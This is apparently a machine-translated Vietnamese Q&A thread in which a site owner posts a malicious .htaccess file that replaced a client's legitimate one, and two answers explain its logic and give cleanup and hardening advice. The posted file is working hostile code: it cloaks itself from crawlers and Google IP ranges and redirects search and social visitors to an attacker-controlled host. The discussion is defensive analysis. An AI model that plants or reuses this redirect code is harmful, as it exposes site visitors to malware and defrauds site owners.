htaccess của trang web khách hàng bị tấn công - không hoàn toàn chắc chắn điều này sẽ làm gì hoặc phải làm gì ở đây

Question

Một trong các trang web khách hàng của chúng tôi đã bị tấn công và các tệp .htaccess được thay thế bằng những điều sau đây.

Có ai có thể chia nhỏ chính xác những gì việc này đang làm không? Theo hiểu biết của tôi, có vẻ như nó đang sử dụng trang giới thiệu, sau đó là tác nhân người dùng, nó đặt cookie có tên là jpg và sau đó chuyển hướng bạn đến siknsty.malicioussite.com, sau đó tìm cách tải xuống một số phần mềm độc hại trước khi giới thiệu bạn quay lại trang web liên kết giới thiệu ban đầu (Vì vậy, đường dẫn của bạn là Google> Trang Phần mềm độc hại> Google)

Nếu cookie jpg được đặt, nó sẽ không giới thiệu bạn ở bất kỳ đâu vì nó giả định rằng bạn đã tải xuống phần mềm độc hại. (điều này có thể sai - tôi nghĩ nó nên giới thiệu bạn đến các trang được liệt kê bên dưới nơi nó chuyển hướng).

Tôi không chắc chắn về phần còn lại hoặc nếu nó sử dụng .htaccess để che dấu các file zip như jpgs (Tôi nghĩ rằng tôi đang đọc mà phải) ...

Bất kỳ ý tưởng bất cứ ai?

Ngoài ra, bất kỳ ý tưởng nào về cách thức hoạt động của máy chủ? Quyền cho tất cả đã được đặt thành 0644 và điều này đã xảy ra trên cả máy chủ Windows và Linux trong cùng một tài khoản.

Thứ tư buổi sáng ballache ahoy.

Ồ và không truy cập trang web đó.

<IfModule prefork.c> 
RewriteEngine On 
RewriteCond %{REQUEST_METHOD} ^GET$ 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?  (tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.).*$ [NC,OR] 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?(hi5\.|blogspot\.|friendfeed\.|friendster\.|google\.).*$ [NC,OR] 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?(yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.).*$ [NC,OR] 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?(aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.).*$ [NC,OR] 
RewriteCond %{HTTP_REFERER}  ^(http\:\/\/)?([^\/\?]*\.)?(lycos\.|metacrawler\.|mail\.|pinterest|instagram).*$ [NC] 
RewriteCond %{HTTP_REFERER}  !^.*(imgres).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|IRIX|Jakarta|JetBrains).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|macDN|Mediapartners|Megite|MetaProducts).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC] 
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC] 
RewriteCond %{REMOTE_ADDR}  !^66\.249.*$ [NC] 
RewriteCond %{REMOTE_ADDR}  !^74\.125.*$ [NC] 
RewriteCond %{HTTP_COOKIE}  !^.*Jpg.*$ [NC] 
RewriteCond %{HTTP_USER_AGENT} .*(Windows|Macintosh|iPad|iPhone|iPod|Android).* [NC] 
RewriteCond %{HTTPS}  ^off$ 
RewriteRule .* - [E=Jpg:%{TIME_SEC}] 
RewriteRule .* - [E=HjT:siknsty.autoeventregistration.com] 

RewriteCond %{ENV:Jpg} 0 
RewriteRule ^.* http://%{ENV:HjT}/lg.php?bannerid=2168&campaignid=1049&zoneid=54&loc=1&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=3dc202f6d9 [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9516:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 1 
RewriteRule ^.* http://%{ENV:HjT}/www/app_full_proxy.php?app=275724075798066&v=1&size=z&cksum=e086bd606215518aed83711368bbecf5&src=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11607:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 2 
RewriteRule ^.* http://%{ENV:HjT}/__utm.gif?utmwv=5.3.3&utms=10&utmn=620248474&utmhn=malang.olx.co.id&utme=8(2!entryPage)9(2!jobs/staticsearch/190\%3Fsearchbox\%3Dretailer\%26section\%3Dst-190)11(2!1)&utmcs=UTF-8&utmsr=1024x768&utmvp=1024x638&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.3\%20r181&utmdt=Gambar\%20MAZDA\%20MR\%20TAHUN\%201992.\%20BIRU\%20-\%20Malang\%20-\%20Mobil&utmhid=312516024&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=vehicles/itemimages/withImg/0&utmac=UA-1240664-1&utmcc=__utma\%3D209359949.1036501994.1340939688.1340939688.1340955051.2\%3B\%2B__utmz\%3D209359949.1340955051.2.2.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dgambar\%2520mobil\%2520mazda\%2520th\%25201992\%3B&utmu=ujGgAAAAIAAAAAAAAAAAAAB~ [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9398:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 3 
RewriteRule ^.* http://%{ENV:HjT}/_xhr/ugccomments/?method=get_context_uuid&context_id=8064b73e-890d-3876-9ce5-c5f7c98574aa&0.2617028157370842&baseurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9127:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 4 
RewriteRule ^.* http://%{ENV:HjT}/ping?h=thefrisky.com&p=/photos/357-12-stars-who-regret-having-plastic-surgery/lisa-rinna-lips-m-jpg-2/&u=i5r1cquurwfzcui1&d=thefrisky.com&g=25328&n=1&f=1&c=0&x=114&y=1865&w=638&j=45&R=1&W=0&I=0&E=0&v=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&b=4187&t=72n4jkji2m79sf6m&V=6&D=nygdmayh2yyvp9w3&i=12\%20Stars\%20Who\%20Regret\%20Having\%20Plastic\%20Surgery\%20Lisa\%20Rinna\%20\%E2\%80\%93\%20The\%20Frisky&_ [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11948:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 5 
RewriteRule ^.* http://%{ENV:HjT}/__utm.gif?utmwv=5.3.2&utms=3&utmn=490784565&utmhn=www.wego.co.id&utme=8(2!Hotels*Google\%20search\%20position)9(2!Details\%20Overview*5)&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x612&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=11.2\%20r202&utmdt=Aston\%20Cengkareng\%20City\%20Hotel\%20\%26\%20Conference\%20Center\%2C\%20Jakarta\%20-\%20Bandingkan\%20tarif\%20kamar\%20-\%20Wego.co.id&utmhid=1324439502&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/hotel/indonesia/jakarta/aston-cengkareng-city-hotel-and-conference-center--133090&utmac=UA-29994605-1&utmcc=__utma\%3D1.786375144.1340094774.1340094774.1340094774.1\%3B\%2B__utmz\%3D1.1340094774.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dstandard\%2520superior\%2520twin\%2520room\%2520aston\%2520hotel\%3B&utmu=qzGggCAAAAAAAAAAAAAAAAB~ [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:10955:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 6 
RewriteRule ^.* http://%{ENV:HjT}/delivery/lg.php?bannerid=30550&campaignid=4402&zoneid=1917&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=dbd1f7d293 [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9621:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 7 
RewriteRule ^.* http://%{ENV:HjT}/api/getCount2.php?cb=stButtons.processCB&refDomain=www.mangahere.com&refQuery=manga/fly_high/v03/c013/37.html&pgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pubKey=e47efe7d-147b-4731-ac42-9838ccdc52f2&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:10798:/:0:HttpOnly] 
RewriteCond %{ENV:Jpg} 8 
RewriteRule ^.* http://%{ENV:HjT}/pingjs/?k=f6ckilz7r2ss&t=Komik\%20Fairy\%20Tail\%20\%7C\%20Chapter\%20288\%20289\%20Hal\%2016\%20-\%20Baca\%20Manga\%20Bahasa\%20Indonesia\%20Online&c=s&y=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&a=-1&r=978836 [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11234:/:0:HttpOnly] 
<!-- Conditions 10 - 58 removed to post on stackoverflow --> 
RewriteCond %{ENV:Jpg} 59 
RewriteRule ^.* http://%{ENV:HjT}/delivery/lg.php?bannerid=31662&campaignid=2&zoneid=1884&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=af167e7f1f [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9285:/:0:HttpOnly] 

</IfModule> 
#a77342b1677255ef6afc9a0dbec166f633c2b44166559458c71fb4e7 

Answer 1

Chọn một trong các chuyển hướng ngẫu nhiên dựa trên thời gian thứ hai. Do đó tại sao họ đi từ 0 đến 59.

Tôi nghĩ rằng bạn nói đúng là nó đặt một cookie để nó không làm điều tương tự một lần nữa cho cùng một nạn nhân.

Loạt quy tắc đầu tiên đang thực hiện những việc như loại bỏ mọi người yêu cầu tệp kết thúc bằng .jpg, .zip, v.v., có thể đảm bảo rằng ai đó thực sự đang xem trình duyệt trước khi chuyển hướng. Các UserAgents cũng là loại trừ (lưu ý! Ở đầu mỗi dòng) - các trình duyệt web khác nhau cộng với một số hệ điều hành và ứng dụng khách mà nó không quan tâm hoặc không thể lây nhiễm. Nó cũng yêu cầu tác nhân người dùng bao gồm một trong số

Windows|Macintosh|iPad|iPhone|iPod|Android 

và liên kết giới thiệu là một trong danh sách dài tên các trang web và công cụ tìm kiếm phổ biến. Điều này có thể là một lần nữa để đảm bảo có một con người phía sau trình duyệt nếu họ đang nhận được trả tiền cho thư rác hoặc nó có thể liên quan đến việc sử dụng trang web của bạn cho ví dụ như nhấp chuột nông nghiệp.

Một điều thú vị là danh sách các khối IP mà nó bỏ qua:

RewriteCond %{REMOTE_ADDR}  !^66\.249.*$ [NC] 
RewriteCond %{REMOTE_ADDR}  !^74\.125.*$ [NC] 

Đây có thể bao gồm các địa chỉ của trang web, do đó chủ sở hữu của trang web (khả năng) không nhận thấy những thiệt hại, hoặc nó có thể cho bạn biết đầu mối của bạn là gì.

Answer 2

Thay vì là một cuộc tấn công trực tiếp/không gian, đó là một cách khôn ngoan để giới thiệu phần mềm độc hại không rõ ràng đối với người dùng cuối.

Dường như đi xe đạp ngẫu nhiên dựa trên thời gian ...(Mà bạn rõ ràng là một số cách để hiểu biết):

1. Hãy trang web xuống cho đến khi bạn hiểu nó
2. Hãy so sánh/Khôi phục từ bản sao lưu gần đây nhất và xem những gì người khác đã được thay đổi trên hệ thống của bạn
3. Kiểm tra file log
4. Khóa tất cả các tài khoản dựa trên máy chủ và chu kỳ tất cả mật khẩu

có một số cách có thể mà điều này đã xảy ra, bao gồm:

1. Tài khoản máy chủ đã bị cưỡng bức (ví dụ: một tài khoản phổ biến ftp/telnet/người dùng hoặc tài khoản phổ biến khác)
2. Mã của bạn đã cung cấp/tạo lỗ hổng mà ai đó đã có quyền truy cập (mặc dù quyền của bạn được đặt thành 644 thì có thể họ đã có quyền truy cập tài khoản root/người dùng bằng cách nào đó hoặc họ sẽ không thể ghi đè lên các tập tin).
3. Out of phần mềm ngày (với lỗ hổng bảo mật (s)) đã được khai thác
4. Piggy hậu thuẫn về một phiên tài khoản người dùng không an toàn

Dưới đây là một vài yếu tố phổ biến để giúp tránh khai thác như vậy, mặc dù bạn có thể tìm thấy các phương pháp bảo mật trên web để khóa xuống linux/win server:

• tripwires Cài đặt trên các tập tin hệ thống quan trọng (một lựa chọn mã nguồn mở:)
• Cài đặt phần mềm/secur cập nhật ity (Secunia là một nguồn vấn đề mới tồn tại từ lâu)
• Xóa/dừng tất cả các tài khoản/dịch vụ không cần thiết
• Sử dụng phần cứng trên cạnh mạng để bảo vệ máy chủ của bạn khỏi truy cập từ bên ngoài (ví dụ: Router với các tính năng bảo mật thông minh - mặc dù điều này là tốn kém)
• Chặn truy cập vào các máy chủ từ IP tĩnh dao động khác so với những người mà bạn sử dụng
• thử nghiệm ứng xử thâm nhập để tìm ra điểm yếu của máy chủ của bạn (s) có và đóng chúng
• Di truy cập bên ngoài bằng cách ngăn chặn những nỗ lực trên các tài khoản sau n cố gắng sử dụng iptables hoặc tương đương